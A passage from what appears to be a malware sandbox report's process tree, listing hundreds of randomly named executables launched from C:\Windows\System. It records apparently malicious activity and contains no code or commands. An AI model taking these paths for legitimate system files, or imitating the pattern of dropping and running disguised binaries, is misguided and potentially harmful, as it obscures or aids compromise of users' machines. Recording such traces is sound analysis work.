  C:\Windows\System\xMiDWjl.exe
  2⤵
  PID:7700
- C:\Windows\System\Ggkagap.exe
  C:\Windows\System\Ggkagap.exe
  2⤵
  PID:7780
- C:\Windows\System\zsIXnpB.exe
  C:\Windows\System\zsIXnpB.exe
  2⤵
  PID:7844
- C:\Windows\System\hCIBgPT.exe
  C:\Windows\System\hCIBgPT.exe
  2⤵
  PID:7916
- C:\Windows\System\PmsNFUZ.exe
  C:\Windows\System\PmsNFUZ.exe
  2⤵
  PID:7944
- C:\Windows\System\tXajWJw.exe
  C:\Windows\System\tXajWJw.exe
  2⤵
  PID:7968
- C:\Windows\System\MEQcfvS.exe
  C:\Windows\System\MEQcfvS.exe
  2⤵
  PID:8048
- C:\Windows\System\OFRTDUL.exe
  C:\Windows\System\OFRTDUL.exe
  2⤵
  PID:8172
- C:\Windows\System\gbkTWHx.exe
  C:\Windows\System\gbkTWHx.exe
  2⤵
  PID:7184
- C:\Windows\System\udJOfdS.exe
  C:\Windows\System\udJOfdS.exe
  2⤵
  PID:7368
- C:\Windows\System\NoAAFFV.exe
  C:\Windows\System\NoAAFFV.exe
  2⤵
  PID:7456
- C:\Windows\System\BUjjsWj.exe
  C:\Windows\System\BUjjsWj.exe
  2⤵
  PID:1652
- C:\Windows\System\ScxemwM.exe
  C:\Windows\System\ScxemwM.exe
  2⤵
  PID:7776
- C:\Windows\System\FULJnaw.exe
  C:\Windows\System\FULJnaw.exe
  2⤵
  PID:7852
- C:\Windows\System\VTLGRfg.exe
  C:\Windows\System\VTLGRfg.exe
  2⤵
  PID:3204
- C:\Windows\System\fmTLIfE.exe
  C:\Windows\System\fmTLIfE.exe
  2⤵
  PID:8100
- C:\Windows\System\xlojCVh.exe
  C:\Windows\System\xlojCVh.exe
  2⤵
  PID:8120
- C:\Windows\System\QALJhEL.exe
  C:\Windows\System\QALJhEL.exe
  2⤵
  PID:6520
- C:\Windows\System\Ngdgqdt.exe
  C:\Windows\System\Ngdgqdt.exe
  2⤵
  PID:7396
- C:\Windows\System\coAkEPY.exe
  C:\Windows\System\coAkEPY.exe
  2⤵
  PID:7620
- C:\Windows\System\ZflqCsA.exe
  C:\Windows\System\ZflqCsA.exe
  2⤵
  PID:7896
- C:\Windows\System\aywrpPC.exe
  C:\Windows\System\aywrpPC.exe
  2⤵
  PID:7920
- C:\Windows\System\vjtjTpF.exe
  C:\Windows\System\vjtjTpF.exe
  2⤵
  PID:3432
- C:\Windows\System\aUUkvrq.exe
  C:\Windows\System\aUUkvrq.exe
  2⤵
  PID:1892
- C:\Windows\System\CfuCTOO.exe
  C:\Windows\System\CfuCTOO.exe
  2⤵
  PID:8196
- C:\Windows\System\zZFIdnQ.exe
  C:\Windows\System\zZFIdnQ.exe
  2⤵
  PID:8240
- C:\Windows\System\NbVxeqM.exe
  C:\Windows\System\NbVxeqM.exe
  2⤵
  PID:8292
- C:\Windows\System\mTuJQsV.exe
  C:\Windows\System\mTuJQsV.exe
  2⤵
  PID:8316
- C:\Windows\System\fMwQLyC.exe
  C:\Windows\System\fMwQLyC.exe
  2⤵
  PID:8332
- C:\Windows\System\ZtWJMQz.exe
  C:\Windows\System\ZtWJMQz.exe
  2⤵
  PID:8376
- C:\Windows\System\pGyGlMt.exe
  C:\Windows\System\pGyGlMt.exe
  2⤵
  PID:8400
- C:\Windows\System\jgkkwuh.exe
  C:\Windows\System\jgkkwuh.exe
  2⤵
  PID:8420
- C:\Windows\System\qmgDQni.exe
  C:\Windows\System\qmgDQni.exe
  2⤵
  PID:8480
- C:\Windows\System\pbhhSeH.exe
  C:\Windows\System\pbhhSeH.exe
  2⤵
  PID:8512
- C:\Windows\System\yBOpedj.exe
  C:\Windows\System\yBOpedj.exe
  2⤵
  PID:8552
- C:\Windows\System\YqNBotK.exe
  C:\Windows\System\YqNBotK.exe
  2⤵
  PID:8568
- C:\Windows\System\cNULjZt.exe
  C:\Windows\System\cNULjZt.exe
  2⤵
  PID:8596
- C:\Windows\System\mdifIqK.exe
  C:\Windows\System\mdifIqK.exe
  2⤵
  PID:8660
- C:\Windows\System\rVhFkQo.exe
  C:\Windows\System\rVhFkQo.exe
  2⤵
  PID:8676
- C:\Windows\System\IZcIljf.exe
  C:\Windows\System\IZcIljf.exe
  2⤵
  PID:8700
- C:\Windows\System\uvTCAVD.exe
  C:\Windows\System\uvTCAVD.exe
  2⤵
  PID:8720
- C:\Windows\System\BKQIqoF.exe
  C:\Windows\System\BKQIqoF.exe
  2⤵
  PID:8748
- C:\Windows\System\VDrjcqf.exe
  C:\Windows\System\VDrjcqf.exe
  2⤵
  PID:8776
- C:\Windows\System\yNXQRJR.exe
  C:\Windows\System\yNXQRJR.exe
  2⤵
  PID:8796
- C:\Windows\System\rJHSysQ.exe
  C:\Windows\System\rJHSysQ.exe
  2⤵
  PID:8824
- C:\Windows\System\hPyArvR.exe
  C:\Windows\System\hPyArvR.exe
  2⤵
  PID:8840
- C:\Windows\System\GoxlsYd.exe
  C:\Windows\System\GoxlsYd.exe
  2⤵
  PID:8880
- C:\Windows\System\fxlsrVD.exe
  C:\Windows\System\fxlsrVD.exe
  2⤵
  PID:8908
- C:\Windows\System\tjAYqvZ.exe
  C:\Windows\System\tjAYqvZ.exe
  2⤵
  PID:8928
- C:\Windows\System\pLSVqlA.exe
  C:\Windows\System\pLSVqlA.exe
  2⤵
  PID:8948
- C:\Windows\System\IrqTfNF.exe
  C:\Windows\System\IrqTfNF.exe
  2⤵
  PID:8964
- C:\Windows\System\iOQUKHs.exe
  C:\Windows\System\iOQUKHs.exe
  2⤵
  PID:8996
- C:\Windows\System\zmKjcoB.exe
  C:\Windows\System\zmKjcoB.exe
  2⤵
  PID:9032
- C:\Windows\System\UWvwfQn.exe
  C:\Windows\System\UWvwfQn.exe
  2⤵
  PID:9088
- C:\Windows\System\QmULAtl.exe
  C:\Windows\System\QmULAtl.exe
  2⤵
  PID:9104
- C:\Windows\System\srCpTWR.exe
  C:\Windows\System\srCpTWR.exe
  2⤵
  PID:9128
- C:\Windows\System\CZDqPPy.exe
  C:\Windows\System\CZDqPPy.exe
  2⤵
  PID:9144
- C:\Windows\System\rriNnTe.exe
  C:\Windows\System\rriNnTe.exe
  2⤵
  PID:9176
- C:\Windows\System\KsIqZrT.exe
  C:\Windows\System\KsIqZrT.exe
  2⤵
  PID:9212
- C:\Windows\System\KBRugOa.exe
  C:\Windows\System\KBRugOa.exe
  2⤵
  PID:7340
- C:\Windows\System\voluMvS.exe
  C:\Windows\System\voluMvS.exe
  2⤵
  PID:8220
- C:\Windows\System\TVqhZLV.exe
  C:\Windows\System\TVqhZLV.exe
  2⤵
  PID:8324
- C:\Windows\System\YjXvcrF.exe
  C:\Windows\System\YjXvcrF.exe
  2⤵
  PID:8384
- C:\Windows\System\olFzirH.exe
  C:\Windows\System\olFzirH.exe
  2⤵
  PID:8396
- C:\Windows\System\lEqJGDb.exe
  C:\Windows\System\lEqJGDb.exe
  2⤵
  PID:8472
- C:\Windows\System\HYFFryq.exe
  C:\Windows\System\HYFFryq.exe
  2⤵
  PID:8536
- C:\Windows\System\pbdTGkW.exe
  C:\Windows\System\pbdTGkW.exe
  2⤵
  PID:8616
- C:\Windows\System\PaqmiNE.exe
  C:\Windows\System\PaqmiNE.exe
  2⤵
  PID:2584
- C:\Windows\System\SgnqgJo.exe
  C:\Windows\System\SgnqgJo.exe
  2⤵
  PID:8636
- C:\Windows\System\wBgkUVq.exe
  C:\Windows\System\wBgkUVq.exe
  2⤵
  PID:8688
- C:\Windows\System\fDNzawg.exe
  C:\Windows\System\fDNzawg.exe
  2⤵
  PID:8788
- C:\Windows\System\XjFVpXb.exe
  C:\Windows\System\XjFVpXb.exe
  2⤵
  PID:8868
- C:\Windows\System\leIzFUN.exe
  C:\Windows\System\leIzFUN.exe
  2⤵
  PID:9028
- C:\Windows\System\lfWvOFj.exe
  C:\Windows\System\lfWvOFj.exe
  2⤵
  PID:9120
- C:\Windows\System\NNAoAzI.exe
  C:\Windows\System\NNAoAzI.exe
  2⤵
  PID:9168
- C:\Windows\System\NNShfet.exe
  C:\Windows\System\NNShfet.exe
  2⤵
  PID:8280
- C:\Windows\System\pYOGDqi.exe
  C:\Windows\System\pYOGDqi.exe
  2⤵
  PID:8256
- C:\Windows\System\ASSwMDH.exe
  C:\Windows\System\ASSwMDH.exe
  2⤵
  PID:8544
- C:\Windows\System\szmFtuG.exe
  C:\Windows\System\szmFtuG.exe
  2⤵
  PID:8508
- C:\Windows\System\GxyNSVz.exe
  C:\Windows\System\GxyNSVz.exe
  2⤵
  PID:7932
- C:\Windows\System\DADQUeX.exe
  C:\Windows\System\DADQUeX.exe
  2⤵
  PID:8876
- C:\Windows\System\aJiAJfj.exe
  C:\Windows\System\aJiAJfj.exe
  2⤵
  PID:9100
- C:\Windows\System\MhBKnhE.exe
  C:\Windows\System\MhBKnhE.exe
  2⤵
  PID:8412
- C:\Windows\System\KloaXEn.exe
  C:\Windows\System\KloaXEn.exe
  2⤵
  PID:8864
- C:\Windows\System\EcNTNoY.exe
  C:\Windows\System\EcNTNoY.exe
  2⤵
  PID:1364
- C:\Windows\System\BmDNUTZ.exe
  C:\Windows\System\BmDNUTZ.exe
  2⤵
  PID:9044
- C:\Windows\System\wEJrkuD.exe
  C:\Windows\System\wEJrkuD.exe
  2⤵
  PID:8640
- C:\Windows\System\eeYvvMK.exe
  C:\Windows\System\eeYvvMK.exe
  2⤵
  PID:9248
- C:\Windows\System\npUUbYk.exe
  C:\Windows\System\npUUbYk.exe
  2⤵
  PID:9284
- C:\Windows\System\qvoRYRQ.exe
  C:\Windows\System\qvoRYRQ.exe
  2⤵
  PID:9308
- C:\Windows\System\SeEYHiz.exe
  C:\Windows\System\SeEYHiz.exe
  2⤵
  PID:9324
- C:\Windows\System\YBhlVMX.exe
  C:\Windows\System\YBhlVMX.exe
  2⤵
  PID:9344
- C:\Windows\System\hDmXskR.exe
  C:\Windows\System\hDmXskR.exe
  2⤵
  PID:9364
- C:\Windows\System\uUdMkTm.exe
  C:\Windows\System\uUdMkTm.exe
  2⤵
  PID:9384
- C:\Windows\System\jwtcNMb.exe
  C:\Windows\System\jwtcNMb.exe
  2⤵
  PID:9424
- C:\Windows\System\iBLMdgF.exe
  C:\Windows\System\iBLMdgF.exe
  2⤵
  PID:9460
- C:\Windows\System\zeQWvIJ.exe
  C:\Windows\System\zeQWvIJ.exe
  2⤵
  PID:9480
- C:\Windows\System\GWEeSSE.exe
  C:\Windows\System\GWEeSSE.exe
  2⤵
  PID:9544
- C:\Windows\System\EOJjKrW.exe
  C:\Windows\System\EOJjKrW.exe
  2⤵
  PID:9564
- C:\Windows\System\VpqOwTn.exe
  C:\Windows\System\VpqOwTn.exe
  2⤵
  PID:9580
- C:\Windows\System\ZrMutcG.exe
  C:\Windows\System\ZrMutcG.exe
  2⤵
  PID:9600
- C:\Windows\System\iwEcpnF.exe
  C:\Windows\System\iwEcpnF.exe
  2⤵
  PID:9648
- C:\Windows\System\EurROkQ.exe
  C:\Windows\System\EurROkQ.exe
  2⤵
  PID:9680
- C:\Windows\System\vgaqmRG.exe
  C:\Windows\System\vgaqmRG.exe
  2⤵
  PID:9700
- C:\Windows\System\xMhsHpO.exe
  C:\Windows\System\xMhsHpO.exe
  2⤵
  PID:9720
- C:\Windows\System\CyWmcCs.exe
  C:\Windows\System\CyWmcCs.exe
  2⤵
  PID:9740
- C:\Windows\System\mMbbKZA.exe
  C:\Windows\System\mMbbKZA.exe
  2⤵
  PID:9760
- C:\Windows\System\kaPITLs.exe
  C:\Windows\System\kaPITLs.exe
  2⤵
  PID:9780
- C:\Windows\System\WMDSVlq.exe
  C:\Windows\System\WMDSVlq.exe
  2⤵
  PID:9828
- C:\Windows\System\LHrlFbb.exe
  C:\Windows\System\LHrlFbb.exe
  2⤵
  PID:9844
- C:\Windows\System\lTfLVTO.exe
  C:\Windows\System\lTfLVTO.exe
  2⤵
  PID:9868
- C:\Windows\System\LprzrwP.exe
  C:\Windows\System\LprzrwP.exe
  2⤵
  PID:9908
- C:\Windows\System\ZajKHtM.exe
  C:\Windows\System\ZajKHtM.exe
  2⤵
  PID:9932
- C:\Windows\System\UbkfUsD.exe
  C:\Windows\System\UbkfUsD.exe
  2⤵
  PID:9968
- C:\Windows\System\RCLAggT.exe
  C:\Windows\System\RCLAggT.exe
  2⤵
  PID:10000
- C:\Windows\System\lVIJPcn.exe
  C:\Windows\System\lVIJPcn.exe
  2⤵
  PID:10036
- C:\Windows\System\QEbamdI.exe
  C:\Windows\System\QEbamdI.exe
  2⤵
  PID:10120
- C:\Windows\System\QBWXMEs.exe
  C:\Windows\System\QBWXMEs.exe
  2⤵
  PID:10136
- C:\Windows\System\jwldIle.exe
  C:\Windows\System\jwldIle.exe
  2⤵
  PID:10152
- C:\Windows\System\DDEeAvI.exe
  C:\Windows\System\DDEeAvI.exe
  2⤵
  PID:10168
- C:\Windows\System\DZzrXkj.exe
  C:\Windows\System\DZzrXkj.exe
  2⤵
  PID:10188
- C:\Windows\System\cCpHZAX.exe
  C:\Windows\System\cCpHZAX.exe
  2⤵
  PID:3772
- C:\Windows\System\tkjeJwv.exe
  C:\Windows\System\tkjeJwv.exe
  2⤵
  PID:9356
- C:\Windows\System\esxzZwl.exe
  C:\Windows\System\esxzZwl.exe
  2⤵
  PID:8476
- C:\Windows\System\ZqStSWc.exe
  C:\Windows\System\ZqStSWc.exe
  2⤵
  PID:9572
- C:\Windows\System\QZvbNFf.exe
  C:\Windows\System\QZvbNFf.exe
  2⤵
  PID:9676
- C:\Windows\System\jcJFajD.exe
  C:\Windows\System\jcJFajD.exe
  2⤵
  PID:9788
- C:\Windows\System\kaQzWmg.exe
  C:\Windows\System\kaQzWmg.exe
  2⤵
  PID:9776
- C:\Windows\System\QcRInBo.exe
  C:\Windows\System\QcRInBo.exe
  2⤵
  PID:9916
- C:\Windows\System\MyXCUbO.exe
  C:\Windows\System\MyXCUbO.exe
  2⤵
  PID:9852
- C:\Windows\System\SWqoqtw.exe
  C:\Windows\System\SWqoqtw.exe
  2⤵
  PID:9900
- C:\Windows\System\oQuSSPI.exe
  C:\Windows\System\oQuSSPI.exe
  2⤵
  PID:9948
- C:\Windows\System\xLreFXm.exe
  C:\Windows\System\xLreFXm.exe
  2⤵
  PID:10024
- C:\Windows\System\qcaufnq.exe
  C:\Windows\System\qcaufnq.exe
  2⤵
  PID:10008
- C:\Windows\System\LdnQTKj.exe
  C:\Windows\System\LdnQTKj.exe
  2⤵
  PID:10084
- C:\Windows\System\WZVRDRg.exe
  C:\Windows\System\WZVRDRg.exe
  2⤵
  PID:10060
- C:\Windows\System\UistAfW.exe
  C:\Windows\System\UistAfW.exe
  2⤵
  PID:9412
- C:\Windows\System\woMbHZJ.exe
  C:\Windows\System\woMbHZJ.exe
  2⤵
  PID:9516
- C:\Windows\System\YigNcUW.exe
  C:\Windows\System\YigNcUW.exe
  2⤵
  PID:9360
- C:\Windows\System\xsenMyC.exe
  C:\Windows\System\xsenMyC.exe
  2⤵
  PID:9420
- C:\Windows\System\IzRWbvk.exe
  C:\Windows\System\IzRWbvk.exe
  2⤵
  PID:9596
- C:\Windows\System\qFkUVeQ.exe
  C:\Windows\System\qFkUVeQ.exe
  2⤵
  PID:10016
- C:\Windows\System\IpDoQND.exe
  C:\Windows\System\IpDoQND.exe
  2⤵
  PID:9928
- C:\Windows\System\vhRpACT.exe
  C:\Windows\System\vhRpACT.exe
  2⤵
  PID:9976
- C:\Windows\System\PCxrriz.exe
  C:\Windows\System\PCxrriz.exe
  2⤵
  PID:1952
- C:\Windows\System\hceGnqO.exe
  C:\Windows\System\hceGnqO.exe
  2⤵
  PID:10232
- C:\Windows\System\pOwpvvJ.exe
  C:\Windows\System\pOwpvvJ.exe
  2⤵
  PID:9712
- C:\Windows\System\BHGPhpC.exe
  C:\Windows\System\BHGPhpC.exe
  2⤵
  PID:9884
- C:\Windows\System\vvqkDLc.exe
  C:\Windows\System\vvqkDLc.exe
  2⤵
  PID:9860
- C:\Windows\System\yxNkPIO.exe
  C:\Windows\System\yxNkPIO.exe
  2⤵
  PID:10132
- C:\Windows\System\OfifAgu.exe
  C:\Windows\System\OfifAgu.exe
  2⤵
  PID:10284
- C:\Windows\System\vIMDdYw.exe
  C:\Windows\System\vIMDdYw.exe
  2⤵
  PID:10300
- C:\Windows\System\ieigrHk.exe
  C:\Windows\System\ieigrHk.exe
  2⤵
  PID:10320
- C:\Windows\System\SYngWjz.exe
  C:\Windows\System\SYngWjz.exe
  2⤵
  PID:10348
- C:\Windows\System\nOLcxso.exe
  C:\Windows\System\nOLcxso.exe
  2⤵
  PID:10388
- C:\Windows\System\OFNANkY.exe
  C:\Windows\System\OFNANkY.exe
  2⤵
  PID:10412
- C:\Windows\System\TcptTvL.exe
  C:\Windows\System\TcptTvL.exe
  2⤵
  PID:10448
- C:\Windows\System\jujJZtb.exe
  C:\Windows\System\jujJZtb.exe
  2⤵
  PID:10480
- C:\Windows\System\SouBUEZ.exe
  C:\Windows\System\SouBUEZ.exe
  2⤵
  PID:10500
- C:\Windows\System\TRrBwUe.exe
  C:\Windows\System\TRrBwUe.exe
  2⤵
  PID:10524
- C:\Windows\System\fCWaWcK.exe
  C:\Windows\System\fCWaWcK.exe
  2⤵
  PID:10548
- C:\Windows\System\kEtLsLE.exe
  C:\Windows\System\kEtLsLE.exe
  2⤵
  PID:10608
- C:\Windows\System\vPcSiHb.exe
  C:\Windows\System\vPcSiHb.exe
  2⤵
  PID:10624
- C:\Windows\System\YKAyZVT.exe
  C:\Windows\System\YKAyZVT.exe
  2⤵
  PID:10652
- C:\Windows\System\mYsQOoi.exe
  C:\Windows\System\mYsQOoi.exe
  2⤵
  PID:10692
- C:\Windows\System\FyJzvyd.exe
  C:\Windows\System\FyJzvyd.exe
  2⤵
  PID:10724
- C:\Windows\System\SQmFOTw.exe
  C:\Windows\System\SQmFOTw.exe
  2⤵
  PID:10752
- C:\Windows\System\KUHwxOG.exe
  C:\Windows\System\KUHwxOG.exe
  2⤵
  PID:10772
- C:\Windows\System\IuqovfO.exe
  C:\Windows\System\IuqovfO.exe
  2⤵
  PID:10796
- C:\Windows\System\gQhwAEw.exe
  C:\Windows\System\gQhwAEw.exe
  2⤵
  PID:10812
- C:\Windows\System\WxDRIra.exe
  C:\Windows\System\WxDRIra.exe
  2⤵
  PID:10840
- C:\Windows\System\DCQfLxv.exe
  C:\Windows\System\DCQfLxv.exe
  2⤵
  PID:10856
- C:\Windows\System\eWphinX.exe
  C:\Windows\System\eWphinX.exe
  2⤵
  PID:10912
- C:\Windows\System\ZbDYuBW.exe
  C:\Windows\System\ZbDYuBW.exe
  2⤵
  PID:10944
- C:\Windows\System\JoGdaGb.exe
  C:\Windows\System\JoGdaGb.exe
  2⤵
  PID:10964
- C:\Windows\System\WJWXUKg.exe
  C:\Windows\System\WJWXUKg.exe
  2⤵
  PID:10980
- C:\Windows\System\ahYhguA.exe
  C:\Windows\System\ahYhguA.exe
  2⤵
  PID:11012
- C:\Windows\System\fRTdczf.exe
  C:\Windows\System\fRTdczf.exe
  2⤵
  PID:11060
- C:\Windows\System\ahoqpFS.exe
  C:\Windows\System\ahoqpFS.exe
  2⤵
  PID:11076
- C:\Windows\System\UWwmztG.exe
  C:\Windows\System\UWwmztG.exe
  2⤵
  PID:11096
- C:\Windows\System\BgJQPaO.exe
  C:\Windows\System\BgJQPaO.exe
  2⤵
  PID:11120
- C:\Windows\System\npljKXJ.exe
  C:\Windows\System\npljKXJ.exe
  2⤵
  PID:11164
- C:\Windows\System\bUwbrAy.exe
  C:\Windows\System\bUwbrAy.exe
  2⤵
  PID:11184
- C:\Windows\System\syFBWFx.exe
  C:\Windows\System\syFBWFx.exe
  2⤵
  PID:11204
- C:\Windows\System\idCBECG.exe
  C:\Windows\System\idCBECG.exe
  2⤵
  PID:11228
- C:\Windows\System\qQqRKcQ.exe
  C:\Windows\System\qQqRKcQ.exe
  2⤵
  PID:11256
- C:\Windows\System\LUSOdvU.exe
  C:\Windows\System\LUSOdvU.exe
  2⤵
  PID:9984
- C:\Windows\System\emaEQCs.exe
  C:\Windows\System\emaEQCs.exe
  2⤵
  PID:10264
- C:\Windows\System\IOIvCcb.exe
  C:\Windows\System\IOIvCcb.exe
  2⤵
  PID:10292
- C:\Windows\System\LiTOuGr.exe
  C:\Windows\System\LiTOuGr.exe
  2⤵
  PID:10360
- C:\Windows\System\uARJerZ.exe
  C:\Windows\System\uARJerZ.exe
  2⤵
  PID:10476
- C:\Windows\System\yHwVrHr.exe
  C:\Windows\System\yHwVrHr.exe
  2⤵
  PID:10520
- C:\Windows\System\aoMQAlF.exe
  C:\Windows\System\aoMQAlF.exe
  2⤵
  PID:10616
- C:\Windows\System\HTynjDG.exe
  C:\Windows\System\HTynjDG.exe
  2⤵
  PID:10668
- C:\Windows\System\FmbSuBY.exe
  C:\Windows\System\FmbSuBY.exe
  2⤵
  PID:10804
- C:\Windows\System\jEomBRI.exe
  C:\Windows\System\jEomBRI.exe
  2⤵
  PID:10852
- C:\Windows\System\gpcKwYc.exe
  C:\Windows\System\gpcKwYc.exe
  2⤵
  PID:10940
- C:\Windows\System\ezPifjj.exe
  C:\Windows\System\ezPifjj.exe
  2⤵
  PID:10976
- C:\Windows\System\DAvZznV.exe
  C:\Windows\System\DAvZznV.exe
  2⤵
  PID:11008
- C:\Windows\System\YzpaRIL.exe
  C:\Windows\System\YzpaRIL.exe
  2⤵
  PID:11108
- C:\Windows\System\FJbPswV.exe
  C:\Windows\System\FJbPswV.exe
  2⤵
  PID:11104
- C:\Windows\System\IcYujie.exe
  C:\Windows\System\IcYujie.exe
  2⤵
  PID:11248
- C:\Windows\System\lbwTZWU.exe
  C:\Windows\System\lbwTZWU.exe
  2⤵
  PID:11220
- C:\Windows\System\itRDkqT.exe
  C:\Windows\System\itRDkqT.exe
  2⤵
  PID:10456
- C:\Windows\System\wQagVFB.exe
  C:\Windows\System\wQagVFB.exe
  2⤵
  PID:10744
- C:\Windows\System\LLbxIve.exe
  C:\Windows\System\LLbxIve.exe
  2⤵
  PID:10732
- C:\Windows\System\kNpRGIQ.exe
  C:\Windows\System\kNpRGIQ.exe
  2⤵
  PID:10960
- C:\Windows\System\zFjePsd.exe
  C:\Windows\System\zFjePsd.exe
  2⤵
  PID:11072
- C:\Windows\System\atqGzTs.exe
  C:\Windows\System\atqGzTs.exe
  2⤵
  PID:10316
- C:\Windows\System\NBhYhKd.exe
  C:\Windows\System\NBhYhKd.exe
  2⤵
  PID:10464
- C:\Windows\System\pTjOZDT.exe
  C:\Windows\System\pTjOZDT.exe
  2⤵
  PID:10820
- C:\Windows\System\dEqnuKx.exe
  C:\Windows\System\dEqnuKx.exe
  2⤵
  PID:11176
- C:\Windows\System\fMhHXjI.exe
  C:\Windows\System\fMhHXjI.exe
  2⤵
  PID:10792
- C:\Windows\System\OVgZHYh.exe
  C:\Windows\System\OVgZHYh.exe
  2⤵
  PID:11280
- C:\Windows\System\QglxGhX.exe
  C:\Windows\System\QglxGhX.exe
  2⤵
  PID:11312
- C:\Windows\System\YKnEyKD.exe
  C:\Windows\System\YKnEyKD.exe
  2⤵
  PID:11332
- C:\Windows\System\RMncYFx.exe
  C:\Windows\System\RMncYFx.exe
  2⤵
  PID:11356
- C:\Windows\System\anRkKda.exe
  C:\Windows\System\anRkKda.exe
  2⤵
  PID:11396
- C:\Windows\System\xGtZMEi.exe
  C:\Windows\System\xGtZMEi.exe
  2⤵
  PID:11416
- C:\Windows\System\BcjPfNR.exe
  C:\Windows\System\BcjPfNR.exe
  2⤵
  PID:11440
- C:\Windows\System\eXGjtGe.exe
  C:\Windows\System\eXGjtGe.exe
  2⤵
  PID:11460
- C:\Windows\System\WdlOmlu.exe
  C:\Windows\System\WdlOmlu.exe
  2⤵
  PID:11484
- C:\Windows\System\tvBNBxr.exe
  C:\Windows\System\tvBNBxr.exe
  2⤵
  PID:11504
- C:\Windows\System\GSuvPuy.exe
  C:\Windows\System\GSuvPuy.exe
  2⤵
  PID:11532
- C:\Windows\System\yOVHKxJ.exe
  C:\Windows\System\yOVHKxJ.exe
  2⤵
  PID:11556
- C:\Windows\System\HYHglnY.exe
  C:\Windows\System\HYHglnY.exe
  2⤵
  PID:11596
- C:\Windows\System\WpfLWqO.exe
  C:\Windows\System\WpfLWqO.exe
  2⤵
  PID:11636
- C:\Windows\System\mdExafi.exe
  C:\Windows\System\mdExafi.exe
  2⤵
  PID:11700
- C:\Windows\System\kubtVri.exe
  C:\Windows\System\kubtVri.exe
  2⤵
  PID:11716
- C:\Windows\System\ThLTJwj.exe
  C:\Windows\System\ThLTJwj.exe
  2⤵
  PID:11740
- C:\Windows\System\xdybJfA.exe
  C:\Windows\System\xdybJfA.exe
  2⤵
  PID:11768
- C:\Windows\System\PoRsMoU.exe
  C:\Windows\System\PoRsMoU.exe
  2⤵
  PID:11788
- C:\Windows\System\tsHlzXH.exe
  C:\Windows\System\tsHlzXH.exe
  2⤵
  PID:11808
- C:\Windows\System\SUaFfGO.exe
  C:\Windows\System\SUaFfGO.exe
  2⤵
  PID:11832
- C:\Windows\System\BSmHjqh.exe
  C:\Windows\System\BSmHjqh.exe
  2⤵
  PID:11852
- C:\Windows\System\ixkVyTq.exe
  C:\Windows\System\ixkVyTq.exe
  2⤵
  PID:11872
- C:\Windows\System\CFssBpA.exe
  C:\Windows\System\CFssBpA.exe
  2⤵
  PID:11908
- C:\Windows\System\cULzFJX.exe
  C:\Windows\System\cULzFJX.exe
  2⤵
  PID:11936
- C:\Windows\System\NvfrBWA.exe
  C:\Windows\System\NvfrBWA.exe
  2⤵
  PID:11956
- C:\Windows\System\fkMlBhj.exe
  C:\Windows\System\fkMlBhj.exe
  2⤵
  PID:12000
- C:\Windows\System\PwmhaFW.exe
  C:\Windows\System\PwmhaFW.exe
  2⤵
  PID:12016
- C:\Windows\System\nZACqHa.exe
  C:\Windows\System\nZACqHa.exe
  2⤵
  PID:12080
- C:\Windows\System\xEsBjQk.exe
  C:\Windows\System\xEsBjQk.exe
  2⤵
  PID:12100
- C:\Windows\System\siXuJuw.exe
  C:\Windows\System\siXuJuw.exe
  2⤵
  PID:12116
- C:\Windows\System\HmpBrUQ.exe
  C:\Windows\System\HmpBrUQ.exe
  2⤵
  PID:12144
- C:\Windows\System\QdTEQHp.exe
  C:\Windows\System\QdTEQHp.exe
  2⤵
  PID:12180
- C:\Windows\System\kSMjVwW.exe
  C:\Windows\System\kSMjVwW.exe
  2⤵
  PID:12204
- C:\Windows\System\MnrhYnH.exe
  C:\Windows\System\MnrhYnH.exe
  2⤵
  PID:12220
- C:\Windows\System\fQFsJHu.exe
  C:\Windows\System\fQFsJHu.exe
  2⤵
  PID:12244
- C:\Windows\System\BwoJmUx.exe
  C:\Windows\System\BwoJmUx.exe
  2⤵
  PID:12268
- C:\Windows\System\PMwsyAE.exe
  C:\Windows\System\PMwsyAE.exe
  2⤵
  PID:12284
- C:\Windows\System\YNIYKMX.exe
  C:\Windows\System\YNIYKMX.exe
  2⤵
  PID:11276
- C:\Windows\System\Pdsoars.exe
  C:\Windows\System\Pdsoars.exe
  2⤵
  PID:11352
- C:\Windows\System\SCfKcNU.exe
  C:\Windows\System\SCfKcNU.exe
  2⤵
  PID:11412
- C:\Windows\System\NejdBkO.exe
  C:\Windows\System\NejdBkO.exe
  2⤵
  PID:11432
- C:\Windows\System\Dkrfwqb.exe
  C:\Windows\System\Dkrfwqb.exe
  2⤵
  PID:11524
- C:\Windows\System\CEGaifR.exe
  C:\Windows\System\CEGaifR.exe
  2⤵
  PID:11656
- C:\Windows\System\ZWfeuga.exe
  C:\Windows\System\ZWfeuga.exe
  2⤵
  PID:11712
- C:\Windows\System\OpolLjt.exe
  C:\Windows\System\OpolLjt.exe
  2⤵
  PID:11784
- C:\Windows\System\mGjQDTv.exe
  C:\Windows\System\mGjQDTv.exe
  2⤵
  PID:11804
- C:\Windows\System\AxUxPWi.exe
  C:\Windows\System\AxUxPWi.exe
  2⤵
  PID:11860
- C:\Windows\System\xJgWsZF.exe
  C:\Windows\System\xJgWsZF.exe
  2⤵
  PID:1552
- C:\Windows\System\IqINtZz.exe
  C:\Windows\System\IqINtZz.exe
  2⤵
  PID:11868
- C:\Windows\System\QlMIFWE.exe
  C:\Windows\System\QlMIFWE.exe
  2⤵
  PID:11928
- C:\Windows\System\SNmaYIp.exe
  C:\Windows\System\SNmaYIp.exe
  2⤵
  PID:11984
- C:\Windows\System\BtSIhei.exe
  C:\Windows\System\BtSIhei.exe
  2⤵
  PID:12036
- C:\Windows\System\tEXKaHp.exe
  C:\Windows\System\tEXKaHp.exe
  2⤵
  PID:12112
- C:\Windows\System\rMZHqnI.exe
  C:\Windows\System\rMZHqnI.exe
  2⤵
  PID:12200
- C:\Windows\System\RekievC.exe
  C:\Windows\System\RekievC.exe
  2⤵
  PID:12232
- C:\Windows\System\ViofyCd.exe
  C:\Windows\System\ViofyCd.exe
  2⤵
  PID:11324
- C:\Windows\System\EvRuTDU.exe
  C:\Windows\System\EvRuTDU.exe
  2⤵
  PID:11468
- C:\Windows\System\BEBYTVh.exe
  C:\Windows\System\BEBYTVh.exe
  2⤵
  PID:11476
- C:\Windows\System\AQrDjXP.exe
  C:\Windows\System\AQrDjXP.exe
  2⤵
  PID:1156
- C:\Windows\System\JFYYZqI.exe
  C:\Windows\System\JFYYZqI.exe
  2⤵
  PID:11724
- C:\Windows\System\XFpbHSj.exe
  C:\Windows\System\XFpbHSj.exe
  2⤵
  PID:12008
- C:\Windows\System\xWfmyDL.exe
  C:\Windows\System\xWfmyDL.exe
  2⤵
  PID:12228
- C:\Windows\System\HXOeuaE.exe
